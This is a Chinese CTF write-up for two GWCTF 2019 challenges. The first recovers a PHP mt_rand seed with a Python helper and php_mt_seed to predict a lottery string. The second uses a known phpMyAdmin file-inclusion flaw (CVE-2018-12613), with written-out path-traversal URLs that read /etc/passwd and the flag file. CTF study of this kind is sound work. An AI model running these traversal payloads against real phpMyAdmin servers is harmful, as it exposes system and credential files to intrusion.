Life has its own fate, and meeting may not be accidental.

0%

GWCTF 2019WP-复现

GWCTF-2019之前比赛没做出来,我真是弟弟!

枯燥的抽奖


要求我们猜出后十位,查看网页源码,发现js指向check.php。

1
8y6CBQcJaW
2
3
<?php
4
#这不是抽奖程序的源代码!不许看!
5
header("Content-Type: text/html;charset=utf-8");
6
session_start();
7
if(!isset($_SESSION['seed'])){
8
$_SESSION['seed']=rand(0,999999999);
9
}
10
11
mt_srand($_SESSION['seed']);
12
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
13
$str='';
14
$len1=20;
15
for ( $i = 0; $i < $len1; $i++ ){
16
    $str.=substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);       
17
}
18
$str_show = substr($str, 0, 10);
19
echo "<p id='p1'>".$str_show."</p>";
20
21
22
if(isset($_POST['num'])){
23
    if($_POST['num']===$str){x
24
        echo "<p id=flag>抽奖,就是那么枯燥且无味,给你flag{xxxxxxxxx}</p>";
25
    }
26
    else{
27
        echo "<p id=flag>没抽中哦,再试试吧</p>";
28
    }
29
}
30
show_source("check.php");

借鉴wonderkun这位大佬写的

private key,来猜测public key

首先把他给的十位数放到这个脚本里:

1
str1='abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
2
str2='8y6CBQcJaW'
3
str3 = str1[::-1]
4
length = len(str2)
5
res=''
6
for i in range(len(str2)):
7
    for j in range(len(str1)):
8
        if str2[i] == str1[j]:
9
            res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
10
            break
11
print(res)

之后再利用php_mt_seed这个脚本,破解seed

php_mt_seed,要先make,php_mt_seed.C生成php_mt_seed文件,再使用。具体语句Readme里面有。

得到seed

1
mt_srand(342457593);
2
$str_long1 = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
3
$str = '';
4
$len1 = 20;
5
for ($i = 0; $i < $len1; $i++) {
6
    $str .= substr($str_long1, mt_rand(0, strlen($str_long1) - 1), 1);
7
}
8
echo "<p id='p1'>" . $str . "</p>";

得到字符。

感谢晓黑老哥,之前php用的是5.3版本,忘记改了,记得要改成7.1及以上。

我有一个数据库

发现phpMyAdmin,可以利用现成poc直接打。

http://ip:port/phpmyadmin/index.php?target=db_datadict.php%253f/../../../../../../../../etc/passwd

发现可以用,试试flag

?target=db_datadict.php%253f/../../../../../../../../flag

参考:cve-2018-12613-PhpMyadmin后台文件包含